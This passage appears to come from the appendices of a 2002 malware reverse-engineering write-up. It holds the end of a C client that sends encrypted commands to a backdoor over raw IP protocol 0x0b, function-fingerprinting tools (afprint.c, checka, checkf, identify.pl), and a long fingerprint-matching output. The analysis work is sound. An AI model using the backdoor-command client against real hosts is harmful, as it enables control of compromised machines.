     buff_size = BUFF_SIZE;

 

     printf("(0x%d)%s\n",*buffer,buffer);

 

     /* Number of bytes to write:

          - if option "-b" was not used, it will write 1480 bytes payload.

          - if option "-b" was used:

                - if "size" is less or equal to "i+1" (characters read plus the 0x02)

                  then we write only the first "size" characters.

                  We set an ENTER (0x0a) at the end of the packet.

                - if "size" is greater than the read characters, "i+1",

                  then we write all the read characters.

     */

 

     /* Payload allways has the characters and an end 0x0a */

     if (size <= i) {

         buffer[size-1]=0x0a;

     }

     else {

         /* Nothing to do: we send all the read chars + zero aditional chars */

     }

 

     /* We encrypt the payload except the two first bytes: 0x02 and the next */

     r_cipher (size-2, ciphertext, cleartext);

     memcpy (cleartext, ciphertext, size-2);

 

 

     /* We only write the number of bytes selected (size) from the buffer */

     write(sock, buffer, size);

 

     /* Re-Initializing buffers */

     bzero(buffer,BUFF_SIZE);

     bzero(ciphertext,BUFF_SIZE);

 

 

     /* NOTE: getline _may_ have changed pbuffer and buff_size  */

     /* This could be a problem: we wouldn't be sending what we expect  */

     /* It seems to be ok as long as we don't try to read too many chars  */

     /* so there's no rush in fixin it  */

     pbuffer   = buffer+1;

     buff_size = BUFF_SIZE-1;

    }

  close(sock);

 

  return 0;

}

 

 

 

/*

Function:

  help

Description:

  prints a help message for the user (obtained with the -h option)

*/

void

help (char * name, char * version)

{

  fprintf(stderr, "USAGE:\n\t%s v%s [-options] \n\n", name, version);

  fprintf(stderr, "Servername is by default localhost.\n");

  fprintf(stderr, "Options:\n");

  fprintf(stderr, "\t-h #\tprint this help\n");

  fprintf(stderr, "\t-p #\tset protocol number (default is 0x0b)\n");

  fprintf(stderr, "\t-s #\tset server name (default is localhost)\n");

  fprintf(stderr, "\t-b #\tpayload block size for transmision (IP header includes 20 bytes)\n");

  fprintf(stderr, "\nExample.-\n");

  fprintf(stderr, "\t%s -shostname -p80 -b128 \n", name);

}

 

 

 

/*

Function:

  talk

Description:

  Creates a socket to the dessired server and protocol.

Returns:

  A file descriptor for the socket (positive value) if successful.

*/

int

talk(char * server_name, int protocol)

{

  struct hostent * host;

  struct in_addr addr;

  int sock, connected;

  struct sockaddr_in address;

 

  /* resolve hostname */

  if (inet_aton(server_name, &addr) == 0)

    {

      host = (struct hostent *)gethostbyname(server_name);

      if (host != NULL)

   memcpy(&addr, host->h_addr_list[0], sizeof(struct in_addr));

      else

   return -1;

    }

 

  /* set address to connect to */

  memset((char *) &address, 0, sizeof(address));

  address.sin_family = AF_INET;

  /*  address.sin_port = (port);*/

  address.sin_addr.s_addr = addr.s_addr;

 

  /* create the socket */

  sock = socket(AF_INET, SOCK_RAW, protocol);

 

  /* "connect" it to set destination address */

  connected = connect(sock, (struct sockaddr *) &address,

               sizeof(address));

  if (connected < 0) {

    perror("connect");

    return -2;

  }

 

  return sock;

}

 



 


Appendix 7: afprint.c program listing

 

 

/*

   afprint.c

*/

 

#include <string.h>

#include <stdlib.h>

#include <unistd.h>

#include <stdio.h>

#include <fcntl.h>

#include <bfd.h>

//#include <libiberty.h>

 

#ifdef USE_OPENSSL

#include <openssl/md5.h>

#else

#include <md5global.h>

#include <md5.h>

#define MD5_Init   MD5Init

#define MD5_Final  MD5Final

#define MD5_Update MD5Update

#endif /* USE_OPENSSL */

 

 

#include "config.h"  //the config file from fenris

 

unsigned char buf[SIGNATSIZE+4];

 

#define CODESEG (((unsigned int)buf) >> 24)

 

unsigned int result[4];

MD5_CTX kuku;

 

int main(int argc,char* argv[]) {

  int f,summ=0;

  asymbol** syms;

  int size,symcnt,i,off;

  bfd* b;

  char tagme=0;

  int ret;

  int num;

 

        bzero(buf,sizeof(buf));

        //ret=read(0,buf,SIGNATSIZE);

   for (num=0;num<SIGNATSIZE;num++) {

         scanf("%2x",&ret);

         buf[num]=ret;

   }

 

        for (f=2;f<SIGNATSIZE;f++) {

          // This ain't no stinkin' code!

          if ((buf[f-2]==0x90) && (buf[f-1]==0x90) && (buf[f] == 0x90)) {

            buf[f-2]=0; buf[f-1]=0;

            tagme=1;

          }

          if (tagme) buf[f]=0;

        }

 

        // For sanity.

        for (f=0;f<SIGNATSIZE;f++)

         if (buf[f]==CODESEG) bzero(&buf[f-3],4);

 

        for (f=0;f<SIGNATSIZE;f++)

         if (buf[f]==0xe8) bzero(&buf[f+1],4);

 

        //printf("CODE DUMP: ");

        //for (f=0;f<SIGNATSIZE;f++) printf("%02X ",buf[f]);

        //printf("\n");

 

        MD5_Init(&kuku);

        MD5_Update(&kuku,buf,SIGNATSIZE);

        MD5_Final((char*)result,&kuku);

 

        result[0] ^= result[2];

        result[1] ^= result[3];

 

        printf("%08X\n",result[0] ^ result[1]);

 

 

  return 0;

 

}

 



 


Appendix 8: checka script

 

 

 

#!/bin/sh

 

DATABASES="*.dat support/*.dat"

 

if [ $# -lt 2 ]

then

   echo "usage: $0 <address to check in databases> <binary file> <function name>"

   exit 1

fi

type objdump >/dev/null 2>&1

if [ $? -ne 0 ]

then

   echo I need objdump command in your PATH

   exit 1

fi

type afprint >/dev/null 2>&1

if [ $? -ne 0 ]

then

   type ./afprint >/dev/null 2>&1

   if [ $? -ne 0 ]

   then

         echo I need afprint executable to be in your PATH

         exit 1

   else

         AFPRINT=./afprint

   fi

else

   AFPRINT=afprint

fi

 

FPRINT=`objdump -d --start-address $1 $2 2>/dev/null| tail +8 | cut -c10- | cut -c-23 | $AFPRINT`

echo ""

if [ $# -lt 3 ]

then

echo Fingerprint for address $1 is $FPRINT

else

echo Fingerprint for address $1 [$3] is $FPRINT

fi

echo Searching in databases...

RESULT=`grep $FPRINT $DATABASES|cut -d' ' -f2|sort -u`

if [ -z "$RESULT" ]

then

   echo No match found.

else

   echo $RESULT| wc -w | awk '{print $line " match(es) found:"}'

   echo " " $RESULT

fi

echo ""

exit 0

 

 



 


Appendix 9: checkf  script

 

 

#!/bin/sh

 

DATABASES="*.dat support/*.dat"

 

if [ $# -lt 1 ]

then

   echo "usage: $0 <binary file to analyze>"

   exit 1

fi

type objdump >/dev/null 2>&1

if [ $? -ne 0 ]

then

   echo I need objdump command in your PATH

   exit 1

fi

type afprint >/dev/null 2>&1

if [ $? -ne 0 ]

then

   type ./afprint >/dev/null 2>&1

   if [ $? -ne 0 ]

   then

         echo I need afprint executable to be in your PATH

         exit 1

   else

         AFPRINT=./afprint

   fi

else

   AFPRINT=afprint

fi

 

checka()

{

FPRINT=`objdump -d --start-address $1 $2 2>/dev/null| tail +8 | cut -c10- | cut -c-23 | $AFPRINT`

echo ""

if [ $# -lt 3 ]

then

echo Fingerprint for address $1 is $FPRINT

else

echo Fingerprint for address $1 [$3] is $FPRINT

fi

echo Searching in databases...

RESULT=`grep $FPRINT $DATABASES|cut -d' ' -f2|sort -u`

if [ -z "$RESULT" ]

then

   echo " " No match found.

   return 1

else

   echo $RESULT| wc -w | awk '{print $line " match(es) found:"}'

   echo " " $RESULT

   return 0

fi

}

 

echo "$0 started at `date`"

NUM=1

NUM_OK=0

for f in `objdump -d $1 2>/dev/null| grep "call   0x"|cut -c40-|sort -u`

do

   let NUM=NUM+1

   checka $f $1 Function_${NUM}

   if [ $? -eq 0 ]

   then

         let NUM_OK=NUM_OK+1

   fi

done

echo ""

echo "$0 finished at `date`"

echo "Analysis of $1 done."

echo "$NUM functions analyzed."

echo "$NUM_OK functions matched."

exit 0

 



 


Appendix 10: identify.pl script

 

 

#!/usr/bin/perl

 

#

# File:

#   identify.pl

#

# Description:

#   Identify functions ala fenris.

#

 

use Digest::MD5 "md5";

use strict;

 

my %recog;

my @line;

my $line;

my @aux;

my $aux;

my @func;

my $addr;

my @bytes;

my $bytes;

my $found;

my $md5;

my @signat;

my $signature;

my $reset;

my $i;

my $j;

 

# check command line

if (@ARGV < 2) {

    die "Usage: $0 <binary_file> <signature_file>\n";

}

 

# load signatures

#print "Loading signatures...";

open(SIGN, $ARGV[1]) ||

    die "ERR: Couldn't open signature file $ARGV[1]: $!";

while ($aux = <SIGN>) {

    chop($aux);

    @aux = split(/\s/, $aux);

    $recog{$aux[2]} = $aux[1];

}

close(SIGN);

#print "done\n";

 

# this assumes that the objdump results fit in memory

open(OBJDUMP, "objdump -d $ARGV[0] 2>/dev/null|") ||

    die "ERR: Failed when using objdump: $!";

@line = <OBJDUMP>;

chop(@line);

close(OBJDUMP);

 

# get the addresses called in @aux

foreach $line (@line) {

    if ($line =~ /call\s+0x/) {

   $aux = (split(/\t+/, $line))[2];

   $aux =~ s/call\s+0x//;

   push(@aux, $aux);

    }

}

#sort them

@aux=sort(@aux);

 

#eliminate duplicates

unshift(@func, shift(@aux));

foreach $line (@aux) {

    push(@func,$line) if ($func[$#func] ne $line);

}

 

# get the n first bytes after a call

foreach $addr (@func) {

    $i = 0;

    $found = 0;

    while (($i < @line) && ($found == 0)) {

   if ($line[$i] =~ /^ $addr/) {

       # get the bytes for the signature

       $j = $i;

       $found = 1;

       $bytes = 0;

       @bytes = ();

       # continue with the next lines till there are 24 bytes

       while ($bytes < 24) {

         @aux = split(/\s+/, (split(/\t/, $line[$j]))[1]);

         $bytes += @aux;

         push(@bytes, @aux);

         $j++;

       }

       while (@bytes > 24) {

         pop(@bytes);

       }

       # sanity checks

       $reset = 0;

       for($j = 0; $j < 24; $j++) {

         if (($bytes[$j] eq "90") && ($bytes[$j] eq "90") &&

             ($bytes[$j+2] eq "90")) {

             $reset = 1;

         }

         $bytes[$j] = 0 if ($reset == 1);

         # remove addresses

         if ($bytes[$j] eq "08") {

             $bytes[$j-3] = $bytes[$j-2] = $bytes[$j-1] =

                $bytes[$j] = 0;

         }

         if ($bytes[$j] eq "e8") {

             $bytes[$j+1] = $bytes[$j+2] = $bytes[$j+3] =

                $bytes[$j+4] = 0;

         }                

       }

 

 

#      print "$addr => @bytes\n";

       for($j = 0; $j < 24; $j++) {

         $bytes[$j] = hex($bytes[$j]);

       }

       $signature = pack("C*", @bytes);

       $md5 = md5($signature);

       @signat = unpack("IIII",$md5);

#      $aux = sprintf("%08X %08X %08X %08X", $signat[0],

#                  $signat[1], $signat[2], $signat[3]);

       $signat[0] ^= $signat[2];

       $signat[1] ^= $signat[3];

       $signature = sprintf("%08X", $signat[0] ^ $signat[1]);

 

#      print "$addr => ($aux) $signature $recog{$signature}\n";

       if ($recog{$signature}) {

         $line[$i] .= "\t$recog{$signature}";

         # replace the calls also

         for($j = 0; $j < @line; $j++) {

             if ($line[$j] =~ /call\s+0x$addr/) {

                $line[$j] .= "\t$recog{$signature}";

             }

         }

       }

   }

   $i++;

    }

    if ($found == 0) {

   print "$addr called but not found.\n";

    }

}

 

# print the edited objdump file

foreach $line (@line) {

    print "$line\n";

}



 


Appendix 11: checkf  output (I)

 

 

This is the output from checkf tool using the default fenris databases:

 

 

# ./checkf /root/chroot/reverse/the-binary

./checkf started at Thu May 23 21:24:59 CEST 2002

 

Fingerprint for address 0x8048080 [Function_2] is EE03C2FA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8048110 [Function_3] is FC3FCF37

Searching in databases...

    No match found.

 

Fingerprint for address 0x8048134 [Function_4] is CD18AE48

Searching in databases...

    No match found.

 

Fingerprint for address 0x8048ecc [Function_5] is 7298C1BA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8048f94 [Function_6] is 0B1EDD74

Searching in databases...

    No match found.

 

Fingerprint for address 0x8049138 [Function_7] is 2C245023

Searching in databases...

    No match found.

 

Fingerprint for address 0x8049174 [Function_8] is 297DB45A

Searching in databases...

    No match found.

 

Fingerprint for address 0x8049564 [Function_9] is F66EED9B

Searching in databases...

    No match found.

 

Fingerprint for address 0x80499f4 [Function_10] is 80BC598B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8049d40 [Function_11] is 0410C84C

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a194 [Function_12] is 4D0BAAE1

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a1e8 [Function_13] is 78D5FF45

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a2a8 [Function_14] is CF7AE9FA

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a48c [Function_15] is 5AEA56CA

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a4f4 [Function_16] is 5E67E55C

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a580 [Function_17] is C1286BE8

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a5cc [Function_18] is 46A39AF7

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a9d8 [Function_19] is 37608659

Searching in databases...

    No match found.

 

Fingerprint for address 0x804b800 [Function_20] is 26ABB864

Searching in databases...

    No match found.

 

Fingerprint for address 0x804bf80 [Function_21] is 8E1B0B58

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c538 [Function_22] is 04450465

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c574 [Function_23] is 1226BE5F

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c5a4 [Function_24] is 2DF9A0D3

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c6fc [Function_25] is 3449046C

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c9e4 [Function_26] is C9790471

Searching in databases...

    No match found.

 

Fingerprint for address 0x804cb94 [Function_27] is BC083482

Searching in databases...

    No match found.

 

Fingerprint for address 0x804cbe4 [Function_28] is A78C94CD

Searching in databases...

    No match found.

 

Fingerprint for address 0x804ce8c [Function_29] is A341591B

Searching in databases...

      1 match(es) found:

    inet_addr

 

Fingerprint for address 0x804ceb4 [Function_30] is E73408BC

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d02c [Function_31] is 22952808

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d2a0 [Function_32] is 4F5285E1

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d404 [Function_33] is 1731AA08

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d458 [Function_34] is 8D57D032

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d484 [Function_35] is C61D9F4F

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d6b8 [Function_36] is D0B481BF

Searching in databases...

      1 match(es) found:

    getshort

 

Fingerprint for address 0x804d6d4 [Function_37] is F20F8D33

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d700 [Function_38] is 29D39C77

Searching in databases...

      1 match(es) found:

    putshort

 

Fingerprint for address 0x804d71c [Function_39] is B1774DB7

Searching in databases...

      2 match(es) found:

    ns_put32 putlong

 

Fingerprint for address 0x804d744 [Function_40] is BBDA720D

Searching in databases...

    No match found.

 

Fingerprint for address 0x804de68 [Function_41] is 88954EDE

Searching in databases...

    No match found.

 

Fingerprint for address 0x804df74 [Function_42] is A0653D9F

Searching in databases...

    No match found.

 

Fingerprint for address 0x804dfb4 [Function_43] is 79948C9D

Searching in databases...

      1 match(es) found:

    res_randomid

 

Fingerprint for address 0x804dfe0 [Function_44] is C111875D

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e180 [Function_45] is 18C85831

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e398 [Function_46] is A947F786

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e490 [Function_47] is A9F3F813

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e638 [Function_48] is 5FA14CD9

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e694 [Function_49] is 5FA14CD9

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e6f8 [Function_50] is C8B768A6

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e884 [Function_51] is 5EFD4E52

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e944 [Function_52] is 6736B356

Searching in databases...

    No match found.

 

Fingerprint for address 0x804ea0c [Function_53] is D856E4CE

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f4f8 [Function_54] is 7D568AF4

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f540 [Function_55] is 20B55824

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f5c4 [Function_56] is 2080D969

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f620 [Function_57] is A4F8A71C

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f680 [Function_58] is 70DCB4D1

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f6d4 [Function_59] is CF479062

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f734 [Function_60] is C9CF7DFA

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f7ec [Function_61] is 9D6614E2

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f808 [Function_62] is F2B20976

Searching in databases...

      8 match(es) found:

    asprintf dprintf fprintf fscanf obstack_printf sprintf sscanf syslog

 

Fingerprint for address 0x804f820 [Function_63] is F85FE8A7

Searching in databases...

    No match found.

 

Fingerprint for address 0x804f888 [Function_64] is 1D0ADB47

Searching in databases...

    No match found.

 

Fingerprint for address 0x8052c9c [Function_65] is 229A27EF

Searching in databases...

    No match found.

 

Fingerprint for address 0x8052de8 [Function_66] is B12652AB

Searching in databases...

    No match found.

 

Fingerprint for address 0x8052e80 [Function_67] is 6678B01F

Searching in databases...

    No match found.

 

Fingerprint for address 0x80530cc [Function_68] is D0895E40

Searching in databases...

    No match found.

 

Fingerprint for address 0x80531dc [Function_69] is 8991BCFD

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054c28 [Function_70] is 2044E47D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054c7c [Function_71] is B99107E5

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054db8 [Function_72] is B313167F

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054df0 [Function_73] is 8F766134

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054e54 [Function_74] is CCA065EB

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054eb0 [Function_75] is F2B20976

Searching in databases...

      8 match(es) found:

    asprintf dprintf fprintf fscanf obstack_printf sprintf sscanf syslog

 

Fingerprint for address 0x8054ec8 [Function_76] is 79C97296

Searching in databases...

    No match found.

 

Fingerprint for address 0x80552b0 [Function_77] is 73B79883

Searching in databases...

    No match found.

 

Fingerprint for address 0x80553a0 [Function_78] is 7EB9F8D3

Searching in databases...

    No match found.

 

Fingerprint for address 0x80555b0 [Function_79] is 5186CEA1

Searching in databases...

    No match found.

 

Fingerprint for address 0x80555fc [Function_80] is BFA3332C

Searching in databases...

    No match found.

 

Fingerprint for address 0x8055668 [Function_81] is 6F2A5448

Searching in databases...

      3 match(es) found:

    getenv libc_fatal unsetenv

 

Fingerprint for address 0x80556cc [Function_82] is 892E25C7

Searching in databases...

    No match found.

 

Fingerprint for address 0x80557e8 [Function_83] is 20D2E00E

Searching in databases...

    No match found.

 

Fingerprint for address 0x80559a0 [Function_84] is BAEE4234

Searching in databases...

    No match found.

 

Fingerprint for address 0x8055e38 [Function_85] is 60DCBA5A

Searching in databases...

    No match found.

 

Fingerprint for address 0x8055ecc [Function_86] is F176DED4

Searching in databases...

    No match found.

 

Fingerprint for address 0x8055f08 [Function_87] is D8F7AA72

Searching in databases...

    No match found.

 

Fingerprint for address 0x8055f34 [Function_88] is B1845073

Searching in databases...

    No match found.

 

Fingerprint for address 0x8055fbc [Function_89] is 09B18AA8

Searching in databases...

    No match found.

 

Fingerprint for address 0x805602c [Function_90] is F5D3F741

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056058 [Function_91] is 13707179

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056064 [Function_92] is 1886DD5E

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056450 [Function_93] is 8EB3962C

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056480 [Function_94] is 7C70C135

Searching in databases...

    No match found.

 

Fingerprint for address 0x805652c [Function_95] is 326903E6

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056570 [Function_96] is 0C88B8DB

Searching in databases...

    No match found.

 

Fingerprint for address 0x80565f8 [Function_97] is 14C14735

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056640 [Function_98] is 32D87F9D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056664 [Function_99] is 9C321016

Searching in databases...

      1 match(es) found:

    strdup

 

Fingerprint for address 0x80566a4 [Function_100] is 19B0CF11

Searching in databases...

      5 match(es) found:

    ether_aton ether_ntoa lcong48 setkey srand48

 

Fingerprint for address 0x80566bc [Function_101] is CDC72536

Searching in databases...

    No match found.

 

Fingerprint for address 0x805680c [Function_102] is 0A7C5829

Searching in databases...

      1 match(es) found:

    strncpy

 

Fingerprint for address 0x80568d0 [Function_103] is 7F1FA0D2

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056954 [Function_104] is 054B8B45

Searching in databases...

    No match found.

 

Fingerprint for address 0x80569bc [Function_105] is 8AE66F9A

Searching in databases...

    No match found.

 

Fingerprint for address 0x80569fc [Function_106] is 882FFA23

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056a2c [Function_107] is 93D3112B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056a74 [Function_108] is 93D3112B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056abc [Function_109] is 93D3112B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056b04 [Function_110] is B5F28613

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056b44 [Function_111] is 16E2ECD3

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056b90 [Function_112] is F380E122

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056bf0 [Function_113] is 16E2ECD3

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056c3c [Function_114] is F380E122

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056c9c [Function_115] is CA0F7AED

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056cf4 [Function_116] is 93D3112B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056d44 [Function_117] is 9C89C698

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056e14 [Function_118] is A0723E77

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056e64 [Function_119] is 0F9A4C0D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056e70 [Function_120] is 4151E7BA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057134 [Function_121] is 20F1D1E3

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057160 [Function_122] is 1C96E7CE

Searching in databases...

    No match found.

 

Fingerprint for address 0x805718c [Function_123] is B7E96D35

Searching in databases...

    No match found.

 

Fingerprint for address 0x80571b8 [Function_124] is B0440C36

Searching in databases...

    No match found.

 

Fingerprint for address 0x80571e8 [Function_125] is BCF79788

Searching in databases...

    No match found.

 

Fingerprint for address 0x805720c [Function_126] is 5527EA2B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057230 [Function_127] is 76D8AF69

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057254 [Function_128] is 77C808E9

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057280 [Function_129] is CC4B9A96

Searching in databases...

    No match found.

 

Fingerprint for address 0x80572b0 [Function_130] is 975983C9

Searching in databases...

    No match found.

 

Fingerprint for address 0x80572dc [Function_131] is 71E8F5C1

Searching in databases...

    No match found.

 

Fingerprint for address 0x805730c [Function_132] is 7F7EF483

Searching in databases...

    No match found.

 

Fingerprint for address 0x805733c [Function_133] is DD587118

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057360 [Function_134] is 55EF7871

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057390 [Function_135] is 3506DCE6

Searching in databases...

    No match found.

 

Fingerprint for address 0x80573bc [Function_136] is 55ED4980

Searching in databases...

    No match found.

 

Fingerprint for address 0x80573e8 [Function_137] is D9229CA5

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057418 [Function_138] is E43431A9

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057444 [Function_139] is 58B72F00

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057470 [Function_140] is A7CD6533

Searching in databases...

    No match found.

 

Fingerprint for address 0x80574a0 [Function_141] is 19F45966

Searching in databases...

    No match found.

 

Fingerprint for address 0x80574c8 [Function_142] is 885E11CD

Searching in databases...

    No match found.

 

Fingerprint for address 0x805751c [Function_143] is 6116998A

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057554 [Function_144] is 84D91FB0

Searching in databases...

    No match found.

 

Fingerprint for address 0x805756c [Function_145] is 168E4F1E

Searching in databases...

    No match found.

 

Fingerprint for address 0x80575c0 [Function_146] is 27AD3901

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057764 [Function_147] is 4E05FA21

Searching in databases...

    No match found.

 

Fingerprint for address 0x80577c0 [Function_148] is 4DC57DD1

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057970 [Function_149] is 1CF2A0E6

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057adc [Function_150] is 1871BDD8

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057b04 [Function_151] is A5AB5D81

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057b30 [Function_152] is B5505CCB

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057be8 [Function_153] is 760EB382

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057db0 [Function_154] is E6D707D8

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057e64 [Function_155] is 5117B726

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057e98 [Function_156] is A71A8A57

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057ed8 [Function_157] is BA45B0EA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057f0c [Function_158] is 00C88D19

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057f48 [Function_159] is C84ECCA9

Searching in databases...

      1 match(es) found:

    mpn_cmp

 

Fingerprint for address 0x8057f88 [Function_160] is 2B18C414

Searching in databases...

    No match found.

 

Fingerprint for address 0x8058094 [Function_161] is 7653F971

Searching in databases...

    No match found.

 

Fingerprint for address 0x8058634 [Function_162] is 84FF8010

Searching in databases...

    No match found.

 

Fingerprint for address 0x8058710 [Function_163] is 25EB0928

Searching in databases...

    No match found.

 

Fingerprint for address 0x805876c [Function_164] is 8CFF30F8

Searching in databases...

    No match found.

 

Fingerprint for address 0x8058de0 [Function_165] is 8A34610C

Searching in databases...

    No match found.

 

Fingerprint for address 0x8058e20 [Function_166] is B0BF2543

Searching in databases...

    No match found.

 

Fingerprint for address 0x8059048 [Function_167] is 56DED7A7

Searching in databases...

    No match found.

 

Fingerprint for address 0x805971c [Function_168] is 96D0E79C

Searching in databases...

    No match found.

 

Fingerprint for address 0x8059938 [Function_169] is 3B6F07EF

Searching in databases...

    No match found.

 

Fingerprint for address 0x8059fb0 [Function_170] is FB7ADB4A

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a010 [Function_171] is 618AE777

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a0b0 [Function_172] is 8A34610C

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a0f0 [Function_173] is AAB4E03F

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a11c [Function_174] is 3BD66190

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a254 [Function_175] is C28BB62A

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a584 [Function_176] is 7988B25C

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a5c4 [Function_177] is FEAB4850

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a634 [Function_178] is C6E90B65

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a6c8 [Function_179] is 3A8D9AB5

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a720 [Function_180] is 06DE6CD6

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a7e4 [Function_181] is 0EA1161E

Searching in databases...

    No match found.

 

Fingerprint for address 0x805aac0 [Function_182] is 1D392289

Searching in databases...

    No match found.

 

Fingerprint for address 0x805af2c [Function_183] is 410086A5

Searching in databases...

    No match found.

 

Fingerprint for address 0x805af5c [Function_184] is 0E99D34D

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b010 [Function_185] is F61BB71E

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b048 [Function_186] is ADB71136

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b10c [Function_187] is 70BDF232

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b128 [Function_188] is 99F3DF3E

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b144 [Function_189] is CD7FD9F8

Searching in databases...

      2 match(es) found:

    init libc_init_first

 

Fingerprint for address 0x805b1c4 [Function_190] is 5275C6C5

Searching in databases...

      1 match(es) found:

    tsearch

 

Fingerprint for address 0x805b4e0 [Function_191] is C974FB0E

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b530 [Function_192] is 15161384

Searching in databases...

      2 match(es) found:

    asctime hcreate

 

Fingerprint for address 0x805b548 [Function_193] is 7FABD94C

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b584 [Function_194] is 31F0BA20

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b5e0 [Function_195] is D672966D

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b61c [Function_196] is 29C9A4B3

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b914 [Function_197] is BB0496A9

Searching in databases...

    No match found.

 

Fingerprint for address 0x805ba88 [Function_198] is 9D152729

Searching in databases...

    No match found.

 

Fingerprint for address 0x805bb34 [Function_199] is 0CC50A70

Searching in databases...

    No match found.

 

Fingerprint for address 0x805bb64 [Function_200] is D57BF6FC

Searching in databases...

    No match found.

 

Fingerprint for address 0x805bbf4 [Function_201] is 0CA08232

Searching in databases...

    No match found.

 

Fingerprint for address 0x805bd74 [Function_202] is AAFC256F

Searching in databases...

    No match found.

 

Fingerprint for address 0x805c290 [Function_203] is E2E398CD

Searching in databases...

    No match found.

 

Fingerprint for address 0x805c7dc [Function_204] is D41EDAD7

